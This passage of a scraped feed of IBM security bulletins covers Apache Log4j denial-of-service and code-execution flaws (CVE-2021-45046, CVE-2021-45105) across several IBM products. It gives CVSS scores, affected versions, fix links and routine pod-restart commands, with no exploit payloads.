/mnt/PV/versioned/uc_dsserver_shared/config\n\n 2. Complete the following steps to manually restart head and worker pods to complete applying the fix. This manual restart can be performed by running the following command: \n\n 1. Wait for the Data Virtualization hurricane pod to start up successfully.\n 2. Run the following commands to restart the Data Virtualization head and worker pods: \n \n current_replicas=$(oc get sts c-db2u-dv-db2u -o jsonpath=\"{.spec.replicas}\"); oc scale sts c-db2u-dv-db2u --replicas=0; sleep 3m; oc scale sts c-db2u-dv-db2u --replicas=$current_replicas\n\n 3. If you see the following error message, restart the Data Virtualization hurricane pod and then repeat step 2. b) \n \n ERR api/pkg/cli/sideload/load.go:73 error=\"file is the wrong size: 154274816, expected: 154143232\\n\"\n\n 3. Data Virtualization is now ready to use.\n\n**Note**_:_\n\n_If you run a security vulnerability scanning tool on the Docker images, you might find that some of the affected packages at the affected version are still present on it. _\n\n_Those packages have been modified according to guidance provided by the Apache Log4j development team so that they are no longer vulnerable._\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-29T00:31:33", "type": "ibm", "title": "Security Bulletin: IBM Data Virtualization on Cloud Pak for Data is vulnerable to arbitrary code execution (CVE-2021-45046) and denial of service (CVE-2021-45105) due to Apache Log4j", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-29T00:31:33", "id": "185EAAB4DDC8472DF44603A1F8F5361C61E9CD92D640BE3D1EC6D31AE959C4F0", "href": "https://www.ibm.com/support/pages/node/6551744", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:57:25", "description": "## Summary\n\nIBM Sterling Configure, Price, Quote uses Apache Log4j (CVE-2021-45105 and CVE-2021-45046) to log messages. The fix includes Apache Log4j v2.17.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Sterling Configure, Price, Quote (CPQ)| 10 \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerability now.**\n\nCPQ Visual Modeler Version 10 FP24 is available on Fix central. Fix Central Link: [http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FSterling+Configurator&amp;fixids=10.0.0.0-Sterling-VM-All-fp00024&amp;source=SAR](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FSterling+Configurator&fixids=10.0.0.0-Sterling-VM-All-fp00024&source=SAR>)\n\nRelease Notes: <https://www.ibm.com/docs/en/configurepricequote/10.0?topic=modeler-defects-addressed-in-this-fix-pack>\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-28T18:05:14", "type": "ibm", "title": "Security Bulletin: IBM Sterling Configure, Price, Quote is vulnerable to denial of service and arbitrary code execution due to Apache Log4j (CVE-2021-45105 and CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-28T18:05:14", "id": "7DDD006076946810EADC174FC2320565F527D46FFF5270A3D6916BF8993B12F9", "href": "https://www.ibm.com/support/pages/node/6551954", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:58:41", "description": "## Summary\n\nVulnerabilities in Apache Log4j could allow an attacker to execute arbitrary code and denial of service on the system. This library is used by the Graphical User Interface (GUI) of IBM Spectrum Scale for logging which is bundled in IBM Elastic Storage System. \n\n## Vulnerability Details\n\n**CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n**DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n**CVEID: **[CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>) \n**DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)** | **Version(s)** \n---|--- \nIBM Elastic Storage System | V6.0.1.0 - V6.0.2.3 \nIBM Elastic Storage System | V6.1.0.0 - V6.1.2.1 \n \n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerability by installing the IBM Elastic Storage System version specific efix:**\n\nContact IBM Support for your affected versions of ESS 3000, ESS 3200 and ESS 5000 to obtain and apply an efix for your level of code:\n\n**Product(s)** | **Remediation(s)** \n---|--- \nIBM Elastic Storage System \n\nV6.0.1.0 - V6.0.2.3 \n\n| For the fix contact [IBM Support](<https://www.ibm.com/mysupport> \"IBM Support\" ) or [call,](<https://www.ibm.com/docs/en/spectrum-scale/5.0.4?topic=center-how-contact-support> \"call\" ) reference** APAR IJ36851** \n \nIBM Elastic Storage System\n\nV6.1.0.0 - V6.1.2.1\n\n| \n\nFor the fix contact [IBM Support](<https://www.ibm.com/mysupport> \"IBM Support\" ) or [call,](<https://www.ibm.com/docs/en/spectrum-scale/5.0.4?topic=center-how-contact-support> \"call\" ) reference** APAR IJ36818** \n \n**Note**: Selected efixes are on Fix Central, see <https://www.ibm.com/support/pages/node/6537748>\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-31T15:31:59", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in Apache Log4j impact IBM Elastic Storage System (CVE-2021-45105, CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2021-12-31T15:31:59", "id": "90B290F66451E3E462C09788B6756181F62A92A8BAA10F2C4BD52977FD8E1B37", "href": "https://www.ibm.com/support/pages/node/6537750", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:45:31", "description": "## Summary\n\nFor the 8.0.0 version of MSO, which is distributed as part of the MAS catalog here are the instructions to move to the 8.0.3 version to get log4j 2.17.1 Apache Log4j - [CVE-2021-45105] (affecting v2.16) and [CVE-2021-45046] (affecting v2.15) \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Maximo Scheduler Optimization| All \n \n\n\n## Remediation/Fixes\n\n**How to manually get Maximo Scheduler Optimization 8.0.0 (MSO) updated to Apache log4j 2.17.1 **\n\n**IBM strongly suggests the following update: \n**\n\nUpdate the Maximo Scheduler Optimization 8.0.0 installed on Maximo Application Suite (MAS) to Version 8.0.3 of MSO.\n\n### Update **Maximo Scheduler Optimization** application\n\nWhen new versions of applications are available, you can update the deployed applications.\n\nTo update an application:\n\n 1. From the Suite Administration Applications pane, select the Addon tab and find the Maximo Scheduler Optimization application that you want to update.\n 2. On the application summary page confirm the 8.0.3 or &gt; version, click **Update**\n\n**Product(s)**| **Version(s) \n**| **Remediation/Fix/Instructions** \n---|---|--- \nIBM Maximo Scheduler Optimization | 8.0| \n\nUpdate [8.0](<https://www.ibm.com/docs/en/mas86/8.6.0?topic=ons-maximo-scheduler-optimization> \"8.0\" ) and follow [instructions](<https://www.ibm.com/docs/en/mas87/8.7.0?topic=ons-maximo-scheduler-optimization> \"instructions\" ) to get the 8.0.3 or &gt; version \n \n## Workarounds and Mitigations\n\nFor MSO 8 version update to the latest version available 8.0.3\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-10-19T14:06:26", "type": "ibm", "title": "Security Bulletin: Apache log4j security vulnerability as it relates to IBM Maximo Scheduler Optimization - Apache Log4j - [CVE-2021-45105] (affecting v2.16) and [CVE-2021-45046] (affecting v2.15)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-10-19T14:06:26", "id": "965AA3643F2C2723C5C9B471B69786B972B6D81B6C917B50EE5BFD6C8447279C", "href": "https://www.ibm.com/support/pages/node/6830617", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:57:14", "description": "## Summary\n\nVulnerabilities in Apache Log4j could result in a denial of service or remote code execution. These vulnerabilities may affect IBM Spectrum Protect Snapshot for VMware due to its use of Log4j for logging of messages and traces. The below fix package includes Log4j 2.17.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Spectrum Protect Snapshot for VMware| 4.1.6.10-4.1.6.13 \n \n## Remediation/Fixes\n\nIBM strongly recommends addressing this vulnerability now by upgrading.\n\n**Note: The below fix package includes Log4j 2.17.**\n\n**_IBM Spectrum Protect Snapshot for VMware Affected Versions \n_**| **_Fixing \nLevel_**| **_Platform_**| **_Link to Fix and Instructions \n_** \n---|---|---|--- \n4.1.6.10-4.1.6.13| 4.1.6.14| Linux| <https://www.ibm.com/support/pages/node/6537580> \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-01T11:37:31", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Apache Log4j affect IBM Spectrum Protect Snapshot for VMware (CVE-2021-45105 and CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-02-01T11:37:31", "id": "3220BFD68D0CE5B97E4EC49AFAD94FC9317DA5DFDBD73C624B022C3E93AC4268", "href": "https://www.ibm.com/support/pages/node/6537644", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:57:30", "description": "## Summary\n\nIBM Watson Assistant for IBM Cloud Pak for Data uses Apache Log4j to log diagnostic data. Vulnerabilities in Apache Log4j (CVE-2021-45105 and CVE-2021-45046) impacts IBM Watson Assistant for IBM Cloud Pak for Data. The fix includes Apache Log4j v.2.17.0. \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Watson Assistant for IBM Cloud Pak for Data| 1.5.0, 4.0.0, 4.0.2, 4.0.4 \n \n \n\n\n## Remediation/Fixes\n\nFor all affected versions, IBM strongly recommends addressing the vulnerability now by upgrading to the upcoming latest (v4.0.5) release of IBM Watson Assistant for IBM Cloud Pak for Data which maintains backward compatibility with the versions listed above. \n\n**Product Latest Version**| **Remediation/Fix/Instructions** \n---|--- \nIBM Watson Assistant for IBM Cloud Pak for Data 4.0.5| \n\nFollow instructions for Installing Watson Assistant in Link to Release (v4.0.5 release information)\n\n<https://www.ibm.com/docs/en/cloud-paks/cp-data/4.0?topic=assistant-installing-watson> \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-27T17:31:15", "type": "ibm", "title": "Security Bulletin: IBM Watson Assistant for IBM Cloud Pak for Data is vulnerable to denial of service and arbitrary code execution due to Apache Log4j (CVE-2021-45105 and CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-27T17:31:15", "id": "7295DCCE494A2CA195C0EC2BD4F052B62F3E1B45826D03ABBF986B81F58BDD31", "href": "https://www.ibm.com/support/pages/node/6551430", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:57:53", "description": "## Summary\n\nThere are vulnerabilities in the Apache Log4j library used by IBM Robotic Process Automation with Automation Anywhere. This affects the IBM Robotic Process Automation with Automation Anywhere control room application. This vulnerability has been addressed by upgrading the Apache Log4j library to version 2.17.0.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Robotic Process Automation with Automation Anywhere| 11.0 \n \n\n\n## Remediation/Fixes\n\nIBM strongly recommends addressing the vulnerability now by upgrading to interim fixpack [11.0.0.10-IF004](<https://www.ibm.com/support/pages/node/6540266> \"11.0.0.10-IF004\" ).\n\n## Workarounds and Mitigations\n\nIf the fixpack 11.0.0.10-IF004 cannot be applied immediately, follows the mitigation steps provided by Automation Anywhere which can be found [here](<https://apeople.automationanywhere.com/s/article/AA-11-x-Update-regarding-CVE-2021-44228-related-to-0-day-in-the-Apache-Log4j2-Java-library> \"here\" ) (Apeople login required).\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-16T04:06:38", "type": "ibm", "title": "Security Bulletin: Due to use of Apache Log4j, IBM Robotic Process Automation with Automation Anywhere is vulnerable to arbitrary code execution (CVE-2021-45046) and denial of service (CVE-2021-45105)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-16T04:06:38", "id": "A2133DCF0D67EC30E5F3D15E39561490E1B16A2750CD5C806DC8F9E95825E247", "href": "https://www.ibm.com/support/pages/node/6541224", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:58:44", "description": "## Summary\n\nVulnerability in Apache Log4j affects IBM Guardium Data Encryption (GDE) (CVE-2021-45105 and CVE-2021-45046). The patch includes Apache Log4j 2.17.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product| Affected Component Name| Affected Version \n---|---|--- \nGDE (4.0.0.6)| Guardium Cloud Key Manager (GCKM) Appliance| 1.10.0 and 1.10.1 \nGDE (4.0.0.5)| Guardium Cloud Key Manager (GCKM) Appliance| 1.9 \n \n\n\n## Remediation/Fixes\n\nDo downloads and apply the patch on GCKM appliance provided by Thales. Customers are encouraged to act quickly to update their systems. \n\nNote: User need to log into the Thales's support portal for accessing the below link.\n\nAffected Product| Affected Component Name and Version| 